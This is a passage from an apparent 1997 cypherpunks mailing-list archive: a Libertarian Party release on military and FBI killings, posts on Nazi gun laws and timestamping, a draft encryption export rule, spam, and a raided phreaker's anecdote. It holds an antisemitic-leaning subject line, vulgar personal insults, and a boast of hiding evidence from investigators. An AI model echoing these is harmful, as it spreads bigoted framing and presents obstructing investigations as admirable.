from the border area, and said the policy of using the U..S. military in
covert anti-drug efforts on American soil was "under review."

        "Was the military upset over the death of an innocent
civilian?" asked Dasbach. "No. The Pentagon was concerned because the
Marines might face criminal penalties for gunning down a high school
student."

        In fact, after the grand jury was convened, Pentagon spokesman
Navy Lt. Cmdr. Scott Campbell complained that counter-drug operations
"are not fair to the members of our armed forces," because it exposes
them to "legal liability."

        In response, the Pentagon said it will ask border states like
Texas, California, Arizona, and New Mexico to sign "status of forces"
agreements with the federal government, which limit U.S. troops'
liability to local criminal law. Such an agreement would be similar to
those the U.S. government signs with foreign nations where American
troops are stationed.

        The case involving the FBI dates back to 1992 -- to the bloody
shootout at Ruby Ridge, Idaho, between the FBI and white separatist
Randy Weaver. During that standoff, an FBI sharpshooter killed Vicki
Weaver as she stood in the doorway of their mountain cabin, holding her
11-month-old daughter in her arms.

        After Randy Weaver surrendered, FBI officials destroyed
documents that detailed the bureau's unorthodox "shoot to kill" orders,
and one agent currently faces jail time for that cover-up.

        But the Justice Department ruled last week that it would not
bring criminal charges against four other senior FBI officials, and
ruled that the FBI gunman who fired the fatal bullet did not commit a
"civil rights" violation by killing Vicki Weaver.

        "No wonder Americans are so concerned about violent crime,"
said Dasbach. "They see criminals in our Armed Forces and in the FBI
committing murder and walking away without punishment -- while their
victims lie in their graves.

        "But Esequiel Hernandez, Jr. and Vicki Weaver aren't the only
victims here. The belief that in America, justice will prevail has also
been mortally wounded. The only cure: For the judicial system to take
immediate steps to bring the killers of these innocent Americans to
justice," he said.

        In addition, Dasbach said the federal government should
immediately demilitarize the War on Drugs, to make sure that another
Redford, Texas-style killing does not occur. Specifically, he
recommended:

        * Decommission the 8,000 military personnel and thousands of
National Guard troops who are participating in anti-drug missions on
U.S. soil, or reassign them to national defense tasks.

        * Immediately terminate all military spending on the War on
Drugs.

        * Demilitarize the U.S./Mexico border.

        * File criminal negligence charges against the military
commanders who sent heavily armed, poorly trained Marines onto private
property, putting American civilians at risk of death.

        "By taking these steps, some good can come from the tragic
death of Esequiel Hernandez, Jr.," said Dasbach. "The U.S. government
can use this opportunity to stop waging war against its own citizens --
and, instead, wage a war for justice."


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCUAwUBM/nQWdCSe1KnQG7RAQF05gP4z/KAS8YO63ZqLkzPd3VsC3EZdDJoClCG
rxzwtkAHpOnm52ecZMw6ZWVMAq+iMwr68wqosEb9uM9nQqv9ObeO7DXBJTigfYZ5
yEho/Ee8Bjpl88n5LVKcF7QeOjsagd67/QpcLXjnTTnd7ETjxPcROWA0NaG5YPUZ
sAiLthYDKg==
=7Kcd
-----END PGP SIGNATURE-----






From breynolds at harborcom.net  Wed Aug 20 14:02:01 1997
From: breynolds at harborcom.net (Bradley E. Reynolds)
Date: Thu, 21 Aug 1997 05:02:01 +0800
Subject: bloodlust or game-theory? (was Re: Alex le Heux)
In-Reply-To: <199708182326.AAA00880@server.test.net>
Message-ID: 



> evaluating net benefits to human happiness in removal of corrupt
> government officials, perhaps you would be happier evaluating societal
> benefits of theoretically removing some 3rd world countries more
> corrupt officials.
> 
> It's not bloodlust, it's game theory...
> 
> Adam
> -- 

Yes, but you must first assert that this is a zero sum game. 

The semantics of such a philosophy are too much to think 
about now. :).

-Brad







From nobody at REPLAY.COM  Wed Aug 20 14:16:48 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 21 Aug 1997 05:16:48 +0800
Subject: Did you know?
Message-ID: <199708202102.XAA28757@basement.replay.com>



> According to a letter dated 7-12-1968--shortly after passage 
> of the Omnibus Crime Act, which contained most of GCA '68, 
> but four months before enactment of the full law -- the Library 
> of Congress provided Sen. Dodd(Dem) a requested translation 
> of the 1938 Nazi gun control law and returned "the Xerox copy 
> of the original German text which you supplied."







From nobody at REPLAY.COM  Wed Aug 20 14:17:33 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 21 Aug 1997 05:17:33 +0800
Subject: The legitimate needs of law enforcement
Message-ID: <199708202102.XAA28736@basement.replay.com>



In 1938, five years after taking power, the Nazis enhanced the 
1928 law. The Nazi Weapons Law introduced handgun control. 
Firearms ownership was restricted to Nazi party members and 
other "reliable" people.







From nobody at REPLAY.COM  Wed Aug 20 14:22:01 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 21 Aug 1997 05:22:01 +0800
Subject: Federalism
Message-ID: <199708202104.XAA28932@basement.replay.com>



Contrary to the Marxists, the Nazis did not advocate public owner-
ship of the means of production. They did demand that the government 
oversee and run the nation's economy. The issue of legal ownership, 
they explained, is secondary; what counts is the issue of control. 
Private citizens, therefore, may continue to hold titles to property, so 
long as the state reserves to itself the unqualified right to REGULATE 
the use of their property...

The Ominous Parallels:Leonard Peikoff







From nobody at REPLAY.COM  Wed Aug 20 14:22:20 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 21 Aug 1997 05:22:20 +0800
Subject: America is largely a Jewish nation
Message-ID: <199708202104.XAA28936@basement.replay.com>



The 1938 Nazi law barred Jews from businesses involving firearms. 
On November 10, 1938 -- one day after the Nazi party terror squads 
(the SS) savaged thousands of Jews, synagogues, and Jewish 
businesses throughout Germany -- new regulations under the 
Weapons Law specifically barred Jews from owning any weapons, 
even clubs or knives.







From abuse at demon.co.uk  Thu Aug 21 05:37:44 1997
From: abuse at demon.co.uk (abuse at demon.co.uk)
Date: Thu, 21 Aug 1997 05:37:44 -0700 (PDT)
Subject: toner
Message-ID: <97Aug21.083529edt.123764-1175@mail2.uunet.ca>








(FOR ALL YOUR PRINTER/COPIER/FAX SUPPLIES)


BENCHMARK PRINT SUPPLY
5579-B Chamblee Dunwoody Rd  #371
Atlanta GA 30338
(770)512-0083

PRINTER SUPPLIES SPECIALS FOR THE MONTH OF JULY;
New toner cartridge prices as follows:

HEWLETT PACKARD
Series 2,3=$59   
Series 2P=$54
Series 4,4M,4 Plus =$79
Series 3SI/4SI=$85
Series 4L=$54
Series 5L=$50
Series 5P=$79  
Series 4V=$100
Series 5SI= $145 
Fax  FX1/FX2=$59
Deskjet/Inkjet= $21


IBM/LEXMARK: 
Optra 4019/4029/4039=$125

EPSON: 
Models  7000/1500=$100 
CANON FAX/PC'S:  
Fax 700,770,5000,7000=$59
PC Copier 6re/7/11=$69 
PC Copier 320/740=$79 


PLEASE CALL FOR OTHER PRINTER/FAX/COPIER/COMPUTER  SUPPLIES NOT
LISTED ABOVE

- VISA/MASTERCARD/AMEX CARDS WELCOME - CORPORATE ACCOUNTS AVAILABLE W/APPROVED CREDIT- OFFICE HOURS ARE 10-6 EST

IF YOU'RE GETTING YOUR TONER CHEEPER  THAN OURS WE OFFER
YOU A 10% DISCOUNT OFF OF WHAT YOU'RE PAYING.

ASK FOR OUR FREE CATALOG. WE CARRY THE LARGEST SELECTION OF
PRINTER/FAX/COPIER/COMPUTER SUPPLIES AVAILABLE.

ORDER FROM  BENCHMARK PRINT SUPPLY ONE OF THE LARGEST 
DISTRIBUTERS OF FAX/PRINTER/COPIER SUPPLIES WITH UNCONDITIONAL
1 YEAR WARRANTY ON ALL PRODUCTS .

TO BE REMOVED FROM OUR LIST CLICK ON BLUE BELOWAND IN THE HEADER TYPE "REMOVE".

click here 
mailto:capital at answerme.com






From nobody at REPLAY.COM  Wed Aug 20 14:38:46 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 21 Aug 1997 05:38:46 +0800
Subject: The Real Bell Issue / Re: Bell, etc
In-Reply-To: <3.0.2.32.19970820140006.0365b7a4@panix.com>
Message-ID: <199708202112.XAA29879@basement.replay.com>




>Don't worry.  If you were busted it would cause a real stink.  Remember 
>Operation Sun Devil.  The Feds really lost it.  Aggressiveness doesn't just 
>mean publicity.  It means strategy at trial as well.  They have to try you 
>and that would be risky for them because we all have an easy First Amendment 
>argument to hammer them with.  The List is defined by its expression and not 
>by anything else so attacks on the list are ipso facto attacks on expression.

>From my point of view, operation sundevil was never about arrests or
prosecuting criminals, it was about scaring the shit out of 15 year olds.

First, many of the people raided under operation sundevil already KNEW that
they were going to be raided, or at least suspected. I myself was informed,
by some friends, some time before the raid that there was a DNR on my phone
line. I also recieved an anonymous phone call "warning" me to stay away
from "hackers". 

Second, the secret service agents actualy preforming the raid seemed to
view it as an elaborate joke after the figured out that the threat to
national security or whatever was 14 years old, in fact, the only agent
there that seemed to take it seriously was a postal inspector who solemly
informed me " your going to jail for a long time buddy" as the secret
service agents chatted about vaious trips to russia guarding reagan and
complimented me on how smart i must be. 

Third, their cell phones didnt work, and after calling the office to get
them to DTMF decode numbers in my speed dial, they never erased the redial
on my phone, leaving their office number there for me to DTMF decode myself. 

They seemed to ignore things that actualy WERE evidence and took things
like calulators and batteries ( they were really excited by the fact that
i had loads of batteries because early blue boxes used loads of power and
you needed to change batteries frequently). 

My lawyer couldnt get ANY information about the investigation and i never
recieved any calls and was never even questioned, dont you think that if
they were interested in breaking a worldwide conspiricy of hackers they
would have at least asked me a few questions? (besides what i used all the
batteries for). 

In any case, there is a HUGE difference between raiding the houses of some
14-15 year old computer geeks who actualy think they will be shot when they
are woken up by a secret service agent with a shotgun in their face and
still believe that an arrest for " computer crimes" will ruin their life
and at best has their very very irate parents to arrange for their defence
and raiding the house of an adult who knows what the effects of their
actions will be, which in computer crimes is just alot of attention, little
jail time, and a fat job when you get out. I almost wish i had gone to
trial, I would never have had to go to college to get a CS degree. 

BTW. about 3 years ago I recieved a call from the NYC secret service field
office , I thought at first they had finaly decided to arrest me. But what
in fact happened is that they decided to return all the computer equipment
siezed in the raid. They returned 2 huge boxes of now obsolete computers
and peripherals , complete with SS evidence tags saying " Location :
Bedroom , Sex: Male" , and SS disks in the 5 1/4 floppy drives  
to potect the heads". Its a good thing they never realized that I gave my
then brand new 20 mb external hard drive to a friend with all the real
evidence on it untill after the raid. They also informed me that the
investigation was still underway and I should wait for further contact. 

    






From remailer at bureau42.ml.org  Wed Aug 20 14:42:14 1997
From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer)
Date: Thu, 21 Aug 1997 05:42:14 +0800
Subject: No Subject
Message-ID: 



"Don't HATE the media... 
beCOME the media!"       
            - J. Biafra






From aba at dcs.ex.ac.uk  Wed Aug 20 15:10:35 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Thu, 21 Aug 1997 06:10:35 +0800
Subject: coercion proof timestamping services
Message-ID: <199708202137.WAA00738@server.test.net>




Just some thoughts about creating more robust time-stamping services.

Current time stamping services just generate a PGP key, and sign any
messages you send them.  PGP signatures already include a time stamp.

Problem: if we find some interesting uses for time-stamps where it
becomes important that no one can coerce the timestamping service into
back-signing timestamps in the past, the current timestampers will be
able to comply, or as they are automated services, simply confiscating
the machine will likely give the attacker all information required to
back date any number of time-stamps.

One solution to this is for the time-stamper to publish all
time-stamps (they are quite small being detached signatures), and
publish a siganature on all the time-stamps stored in one file each
day.  Perhaps even publish the signature in a newspaper.  Anyone with
that newspaper, or an archive of the master signature only, will be
able to verify any claimed time-stamps -- the publically published
hash (in the signature) must match the time-stamps archived for that
day.

Another way is perhaps to have a sequence of keys for signing
time-stamps on each day, and to discard the private key after that
day.  Authenticate the use-for-one-day-only keys by signing with a
long term key.  If people archive daily keys, the coercion of
timestamping service will be detected if it attempts to publish a
daily key for some date in the past, and the timestamping service
can't sign with old keys as it has purposely discarded the private
halves.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0



>Personally, when I email politicians and the like, I usually use
>anonymous remailers, including the Georgia Cracker, so that I don't
>have to worry about being discriminated against and/or investigated
>and/or imprisoned for being afflicted with a physical and mental
>condition which causes me great discomfort when I am forced to tell
>polite lies under the guise of free speech.

Remailers are here to help the weak against the powerful.

I use em 10 times a day.

>  In short, a ratfucker is a ratfucker is a ratfucker, and if anyone
>objects to being called one, then they should make an effort not to
>be one, rather than calling for my head on a platter because I call
>a spade a spade (or a "fucking shovel").

Damned right.

>  Two nights ago I began to teach my niece and her high-school girl
>friend how to use remailers for anonymity to communicate with others
>in a manner that will not leave them vulnerable to tracking/stalking
>by strangers.

Good Ideas...  How about publishing how to use remailers and post it to a
high school Bulletin Board?

>  If someone wants to spam me, or threaten me, or whatever, through
>the use of anonymous remailers, fine--I have a delete key and I have
>mail filters.

A many a Christian bunghole forgets that instead of forcing their god down
people's throats, (Tyranny of the MINORITY) they should make an effort to
realize there's such a thing as the real world, were god doesn't matter to
some people.

>  Every time some Nazi piece of shit announces his or her intention
>to "protect" somebody, my freedom, privacy and human rights seem to
>get thrown in the trash. 

Yeah, "We gotta protect the children from the pedophiles and cypherpunks!"
I've heard shit like that often from politicians.

>  I'm growing tired of those who want to lock all of the doors on
>the InterNet and control the keys so that the citizens will be
>imprisoned behind an ElectroMagnetic Curtain where they are only
>allowed to travel at the discretion of a higher authority.

Damn right again.

>  My advice to well-meaning fascist censors is to stay the fuck out
>of the InterNet regulation business, because there are too many 
>people on the InterNet who have experienced its freedom and who will
>no go easily into the dark night.

Damn right for the third time.

>  I was in Poland shortly after the fall of The Wall, and was talking
>to a lady who was describing how hard life had become in the resulting
>"chaos of the new." I asked her if she thought that the citizens would
>return to the former political system if conditions got bad enough.
>  She said, "Over my dead body."

Which describes my similar views of the growing socialism in America.

>  Someone wants to shut down your remailer? Fine. I'll start one up.
>They want to shut down my remailer? Fine, but what about the Eternity
>Servers?
>  Don't know about the Eternity Servers? They are waiting to route
>around the damage caused by shutting down remailers, and there is
>another technology waiting to replace the Eternity Servers if they
>get shut down.

If they knock em out, another one just takes over and fills in.  Kinda like
Dynamic Routing.

>  I, for one, am not going to stand by listlessly while fascists
>attempt to build an ElectroMagnetic Curtain around me.
>  I have a byte, and I'm not afraid to use it.

Heheh, "Take a byte out of Net.fascists"






From jya at pipeline.com  Wed Aug 20 16:07:08 1997
From: jya at pipeline.com (John Young)
Date: Thu, 21 Aug 1997 07:07:08 +0800
Subject: Draft CCL Encryption Items Rule
Message-ID: <1.5.4.32.19970820223706.0072b9e8@pop.pipeline.com>



We've received from anonymous a July 25 draft of an Encryption
Items Interim Rule for the Export Administration Regulations
which describes Commerce Control List changes in response to 
public comments on the December 30, 1996 interim rule.

   http://jya.com/bxa-ei-rule.htm  (82K)

The draft is in Federal Register format but, as far as we have been
able to find, has not been published there. So if this doc was published
we'd like to hear.

Assuming the draft is legitimate, here's its summary of provisions (much
expanded in the full document):

[Begin summary]

Based on public comments to the December 30 interim rule, this interim rule
specifically makes the following changes:

- In �732.2, clarifies that BXA will consider acknowledgments and
assurances in electronic form provided that they are adequate to assure
legal undertakings similar to written acknowledgments and assurances.

- In �734.3, clarifies that downloading or causing the downloading of
encryption source code and object code in Canada is not controlled and does
not require a license, and clarifies that the methods used as precautions
to prevent unauthorized transfer of such code outside the United States or
Canada must be approved by BXA.

- In �740.6, clarifies that letters of assurance may be accepted in the
form of a letter or any other written communication from the importer,
including communications via facsimile.

- In �740.8, adds recovery encryption technology to the list of items
eligible for export under License Exception KMI, after a one-time review,
and adds a paragraph to authorize exporters of non-key recovery products
under License Exception KMI to service and support existing customers of
those products after the two-year transition period.  This section is also
amended by adding a paragraph to authorize exporters of non-recovery
encryption products under License Exception KMI to export additional
quantities of such products to existing customers under a license after the
two-year transition period.

- �740.8 is also amended by adding a new paragraph to authorize, after a
one-time review, exports and reexports under License Exception KMI of
non-key recovery financial-specific encryption items of any key length that
are restricted by design (e.g., highly field-formatted with validation
procedures, and not easily diverted to other end-uses)  for financial
applications to secure financial transactions, for end-uses such as intra
or inter-banking transfers and home banking.  No business and marketing
plan to develop, produce, and/or market similar encryption items with
recoverable features is required. Conforming changes are also made in
�742.15.

- In �740.9, removes the reference to Country Group D:1.  This clarifies
that encryption software controlled for EI reasons under ECCN 5D002 may be
pre-loaded on a laptop and exported under the tools of trade provisions of
License Exception TMP or License Exception BAG.

- In �740.14, clarifies existing provisions of License Exception BAG and
imposes a restriction on the use of BAG for exports or reexports of
EI-controlled items to terrorist supporting destinations or by other than
U.S. citizens and permanent residents.

-  �742.15 is amended adding a new paragraph that authorizes exports under
an Encryption Licensing Arrangement of general purpose non-key recovery,
non-voice encryption items of any key length for use by financial
institutions (such as banks) in all destinations except Cuba, Iran, Iraq,
Libya, North Korea, Syria and Sudan.  Applications will be reviewed on a
case-by-case basis, and must be supported by a satisfactory business and
marketing plan which explains in detail the steps the applicant will take
during the two year transition period beginning January 1, 1997 to develop,
produce, and/or market similar encryption items with recoverable features.

- In Supplement No. 4 to part 742, paragraph (3), revises "reasonable
frequency" to "at least once every three hours" to resolve the ambiguity on
how often the output must identify the key recovery agent and
material/information required to decrypt the ciphertext.

- In Supplement No. 4 to part 742, paragraph (6)(i), clarifies that the
U.S. government must be able to obtain the key(s) or other
material/information needed to decrypt all data, without restricting the
means by which the key recovery products allow this.

- In Supplement No. 6 to part 742, eliminates the test vector requirement
for 7-day mass-market classification requests and replaces it with a
requirement to provide a copy of the encryption subsystem source code.

-  In Supplement No. 6 to part 742, adds 40-bit DES as being eligible for
consideration for mass-market eligibility, subject to the additional
criteria listed in this supplement.

- In �� 748.9 and 748.10, clarifies a long-standing policy that no support
documentation is required for exports of technology or software, and it
removes the requirement for such support documentation for exports of
technology or software to Bulgaria, Czech Republic, Hungary, Poland,
Romania, or Slovakia.  This rule also exempts from support documentation
requirements all encryption items controlled under ECCNs 5A002, 5B002,
5D002 and 5E002.  This conforms with the practice under the ITAR prior to
December 30, 1996.

- In �750.7, authorizes certain specified changes to Commerce and State
Encryption Licensing Arrangements by letter.

- In �752.3, excludes encryption items controlled for EI reasons from
eligibility for a Special Comprehensive License.

- In �770.2, adds a new interpretation to clarify that encryption software
controlled for EI reasons under ECCN 5D002 may be pre-loaded on a laptop
and exported under the tools of trade provision of License Exception TMP or
the personal use exemption under License Exception BAG, subject to the
terms and conditions of such License Exceptions.

- In part 772, adds new definitions for "effective control", "encryption
licensing arrangement", "financial institution" and "recovery encryption
products".

- In Supplement No. 1 to part 774, Category 5 - Telecommunications and
Information Security is amended by revising ECCN 5A002 to authorize exports
of components and spare parts under License Exception LVS, provided the
value of each order does not exceed $500 and to clarify that equipment for
the encryption of interbanking transactions is not controlled under that
entry.

- Revises the phrase "up to 56-bit key length DES" where it appears to read
"up to or equal to 56-bit key length DES", and makes other editorial
changes.

[End summary]






From anon at anon.efga.org  Wed Aug 20 16:20:56 1997
From: anon at anon.efga.org (Anonymous)
Date: Thu, 21 Aug 1997 07:20:56 +0800
Subject: None
Message-ID: 



>It's actually closer to a cult -- a small group with it's own shared
>reality -- a reality quite at variance with societal norms.  The cult
>has its own terminology, and an underlying dogma to which these code
>words refer.  The cult has "special knowledge" that has been revealed
>to them concerning massive changes that will happen to society --
>changes that will usher in a new world order.  These changes may 
>involve the world going through a cleansing fire of war of war and 
>destruction. 

Ahhh, look, the spook speaks.

>Certain of the members sport a messiah or a martyr complex.  It is 
>also quite common for cults to call for arming the brethren against 
>the coming struggle -- even the Heaven's Gate group apparently had 
>stashes of weapons.
>
>It's all so predictable.

I would just like to say this:

Kent is a shill.

Let me say it again:

Kent is a shill.

He's so predictable.






From whgiii at amaranth.com  Wed Aug 20 17:00:57 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Thu, 21 Aug 1997 08:00:57 +0800
Subject: coercion proof timestamping services
In-Reply-To: <199708202137.WAA00738@server.test.net>
Message-ID: <199708202358.SAA23598@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In <199708202137.WAA00738 at server.test.net>, on 08/20/97 
   at 10:37 PM, Adam Back  said:

>One solution to this is for the time-stamper to publish all
>time-stamps (they are quite small being detached signatures), and publish
>a siganature on all the time-stamps stored in one file each day.  Perhaps
>even publish the signature in a newspaper.  Anyone with that newspaper,
>or an archive of the master signature only, will be able to verify any
>claimed time-stamps -- the publically published hash (in the signature)
>must match the time-stamps archived for that day.

This is how Stamper works. The time stampes are published to various NG's
& mailling lists once a week.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/t2jY9Co1n+aLhhAQHUgwQAnTprQx1BDbWaj5gDeOn+6MMNQE9AW/N6
3CDvw+iYokUBxYkdqpR+K2b9xCCO2Lu/L9xcnIEb0Wehe5YG8usm6tmwaVVd9G7c
pnI4XlYxrNjaZROAWiAYPdBq+hE/HMNUo9B3mmeAeXftoIj3VJ5JvBkzWNdUB/Lj
qrc5dslsXTw=
=Q2QL
-----END PGP SIGNATURE-----






From alan at ctrl-alt-del.com  Wed Aug 20 17:10:58 1997
From: alan at ctrl-alt-del.com (Alan)
Date: Thu, 21 Aug 1997 08:10:58 +0800
Subject: coercion proof timestamping services
In-Reply-To: <199708202137.WAA00738@server.test.net>
Message-ID: 



On Wed, 20 Aug 1997, Adam Back wrote:

> Just some thoughts about creating more robust time-stamping services.
> 
> Current time stamping services just generate a PGP key, and sign any
> messages you send them.  PGP signatures already include a time stamp.
> 
> Problem: if we find some interesting uses for time-stamps where it
> becomes important that no one can coerce the timestamping service into
> back-signing timestamps in the past, the current timestampers will be
> able to comply, or as they are automated services, simply confiscating
> the machine will likely give the attacker all information required to
> back date any number of time-stamps.
> 
> One solution to this is for the time-stamper to publish all
> time-stamps (they are quite small being detached signatures), and
> publish a siganature on all the time-stamps stored in one file each
> day.  Perhaps even publish the signature in a newspaper.  Anyone with
> that newspaper, or an archive of the master signature only, will be
> able to verify any claimed time-stamps -- the publically published
> hash (in the signature) must match the time-stamps archived for that
> day.

Or post to a news group.  (Some form of transport that can be automated
and widely distributed without having to create new protocols.)

> Another way is perhaps to have a sequence of keys for signing
> time-stamps on each day, and to discard the private key after that
> day.  Authenticate the use-for-one-day-only keys by signing with a
> long term key.  If people archive daily keys, the coercion of
> timestamping service will be detected if it attempts to publish a
> daily key for some date in the past, and the timestamping service
> can't sign with old keys as it has purposely discarded the private
> halves.

Also maintaining the temporary keys on some sort of volitile storage media
that does not leave traces for later when erased.  (RAM disk or the like.)
Keep the private key on the card and erase the old key as part of the
private key generation process.

The only weakness I see here (there may be others) is keeping the long
term key secure.  (Keeping the bad guys from generating their own bogus
keys for later timestamps and the like.)

alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.






From mbp at pharos.com.au  Wed Aug 20 17:25:50 1997
From: mbp at pharos.com.au (Martin Pool)
Date: Thu, 21 Aug 1997 08:25:50 +0800
Subject: (Fwd) Release: Texas & Ruby Ridge killings (fwd)
In-Reply-To: 
Message-ID: 



On Wed, 20 Aug 1997, Jim Burnes forwarded a message from announce at lp.org:

> ------- Forwarded Message Follows -------
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> ===============================================
> NEWS FROM THE LIBERTARIAN PARTY
> 2600 Virginia Avenue, NW, Suite 100
> Washington DC 20037
> ===============================================
[...]

On my machine, using keyid 1024/A7406ED1  the signature
did not match the message.  Most likely there was a harmless alteration in
the process of being forwarded, but possibly the message is bogus. 

Martin Pool






From jim.burnes at ssds.com  Wed Aug 20 17:30:11 1997
From: jim.burnes at ssds.com (Jim Burnes)
Date: Thu, 21 Aug 1997 08:30:11 +0800
Subject: (Fwd) Release: Texas & Ruby Ridge killings (fwd)
In-Reply-To: 
Message-ID: 





On Thu, 21 Aug 1997, Martin Pool wrote:

> On Wed, 20 Aug 1997, Jim Burnes forwarded a message from announce at lp.org:
> 
> > ------- Forwarded Message Follows -------
> > -----BEGIN PGP SIGNED MESSAGE-----
> > 
> > ===============================================
> > NEWS FROM THE LIBERTARIAN PARTY
> > 2600 Virginia Avenue, NW, Suite 100
> > Washington DC 20037
> > ===============================================
> [...]
> 
> On my machine, using keyid 1024/A7406ED1  the signature
> did not match the message.  Most likely there was a harmless alteration in
> the process of being forwarded, but possibly the message is bogus. 
> 
> Martin Pool
> 
> 

Yes...the "-------- Forwarded Message Follows ------" line.

Unless you already took that into account in which case its
probably the ">" symbols or something to that effect.

Jim







From billp at nmol.com  Wed Aug 20 17:40:10 1997
From: billp at nmol.com (billp)
Date: Thu, 21 Aug 1997 08:40:10 +0800
Subject: Give the gov bad pr
Message-ID: <33FB97DA.4FCF@nmol.com>

cypherpunks, 

>From my and others' standpoint at Sandia, NSA, FBI, and NIST are
only interested in crypto from a business standpoint.

They want the taxpayer to support their business interests.

Some of us at Sandia kicked back.

Allahu akbar!!!
bill

Title: William H. Payne - Arthur R. Morales Documents






Revised 16 August 1997

21 June 1997

  

  WILLIAM H. PAYNE �- ARTHUR R. MORALES DOCUMENTS



  
    
      These documents pertain to a suit by cryptographer�William
	H. Payne and Arthur R. Morales against the�National Security Agency
	�(NSA) and related complaints by Payne against his former employer Sandia
	National Laboratories (SNL or Sandia), US Department of Energy, and federal
	officials. Sandia performs contract work for NSA, part of which involves
	cryptographic systems for nuclear weapons controls.
	
	Payne worked on classified cryptographic systems at Sandia.�He is a
	noted scholar, scientist and author of cryptography and computer programming
	books�and articles.*
	
	The documents�describe Sandia's termination of Payne for alleged security
	violations, Payne's defense against the security violation charges, and Payne's
	counter-charges against Sandia and NSA of wrongful termination for criticizing
	NSA's cryptographic deficiencies and�other cryptography-related misdeeds.
    
    
      
    
    
      
	Date
      
	Topic
      
	URL
    
    
      16 August�1997
      Payne-Morales Writ�of�Mandamus Against US District �Court
	Judges Svet and Campos
      http://jya.com/whp-usca10.htm
    
    
      21 June 1997
      NSA Suit - Motions and Scheduling Order
      http://jya.com/nsasuit6.htm
    
    
      4 June 1997
      Complaints to Supreme Justice Scalia
      http://www.jya.com/whpscalia.htm
    
    
      4 June 1997
      U.S. Attorney Warns Payne
      http://jya.com/whprjg.htm
    
    
      1 June 1997
      Data Authenticator for the Deployable Seismic Verification System
      http://jya.com/da/whpda.htm
    
    
      1 June 1997
      Secret Compartmented Information Nondisclosure Agreement
      http://jya.com/scinda.htm
    
    
      31 May 1997
      Embedded Controller Forth for the 8051 Family
      http://jya.com/f86/whpf86.htm
    
    
      29 May 29 1997
      Notification to Secretary of Energy Pena
      http://jya.com/whppena.htm
    
    
      16 May 1997
      Payne on RSA and NSA
      http://jya.com/whprsa.htm
    
    
      13 May 1997
      Payne Accuses Sandia Labs Director
      http://jya.com/snlhit.htm
    
    
      11 May 1997
      NSA �Suit�- Initial Scheduling Order
      http://jya.com/nsasuit5.htm
    
    
      21 April 1997
      NSA Suit - SNL Affidavits/Letters on Classified Data
      http://jya.com/nsasuit4.htm
    
    
      12 April 1997
      NSA Suit - Answers from NSA
      http://jya.com/nsasuit3.htm
    
    
      14 March�1997
      Payne Letter to the FBI
      http://jya.com/whp2.htm
    
    
      8 March 1997
      News Report on NSA and Crypto AG
      http://jya.com/nsa-sun.htm
    
    
      8�March 1997
      News Reports on NSA Suit
      http://jya.com/whp1.htm
    
    
      8�March 1997
      NSA Suit - FOIA Appeal
      http://jya.com/nsasuit2.txt
    
    
      8�March 1997
      NSA Suit - Complaint�for Injunctive�Relief
      http://jya.com/nsasuit.txt
    
    
      
    
    
      Following are Department of Energy decisions and orders on
	William H. Payne's appeals of actions on his requests for information.
    
    
      
    
    
      20 February 1997
      Case No. VFA-0262, 26 DOE � 80,161
      http://www.oha.doe.gov/cases/foia/vfa0262.htm
    
    
      16 December 1996
      Case No. VFA-0243, 26 DOE � 80,144
      http://www.oha.doe.gov/cases/foia/vfa0243.htm
    
    
      10 July 1996
      Case No. VFA-0178, 25 DOE � 80,214
      http://www.oha.doe.gov/cases/foia/vfa0178.htm
    
    
      6�May 1996
      Case No. VFA-0148, 25 DOE � 80,190
      http://www.oha.doe.gov/cases/foia/vfa0148.htm
    
    
      26 March 1996
      Case No. VFA-0128, 25 DOE � 80,184
      http://www.oha.doe.gov/cases/foia/vfa0128.htm
    
    
      8�November 1995
      Case No. VFA-0091, 25 DOE � 80,147
      http://www.oha.doe.gov/cases/foia/VFA0091.HTM
    
    
      10 October 1995
      Case No. VFA-0076, 25 DOE � 80,140
      http://www.oha.doe.gov/cases/foia/VFA0076.HTM
    
    
      
    
    
      
	* Selected Works of William H. Payne
	
	Payne, William H., Data Authenticator
	for the Deployable Seismic Verification System, Sandia Report SAND91-2201,
	UC-706, Sandia National Laboartories, June 1992.
	
	Payne, William H., Embedded Controller
	FORTH For the 8051 Family, Academic Press, Harcourt, Brace and
	Jovanovich, 1990.
	
	Payne, William, and Payne, Patricia, Implementing Basics: How BASICs
	Work, Reston Publishing, Reston, Virginia, 1982.
	
	Payne, W.H., and McMillen, K.L., Orderly Enumeration of Nonsingular Binary
	Matrices Applied to Text Encryption, Communciations of the ACM, vol.
	21, 4 (April 1978), 259-263.
	
	Lewis, T.G., and Payne, W.H., Generalized Feedback Shift Register Pseudorandom
	Number Generator, Journal of the ACM 20, 3 (July 1973), 456-468.
	
      
    
  






From remailer at bureau42.ml.org  Wed Aug 20 17:42:22 1997
From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer)
Date: Thu, 21 Aug 1997 08:42:22 +0800
Subject: No Subject
Message-ID: 



I have found a million documents on the INSLAW affair but not one that
mentions anything after the lame Congressional investigation in 1992.
Does anybody have pointers to events since that time?

Thanx






From mbp at pharos.com.au  Wed Aug 20 17:44:46 1997
From: mbp at pharos.com.au (Martin Pool)
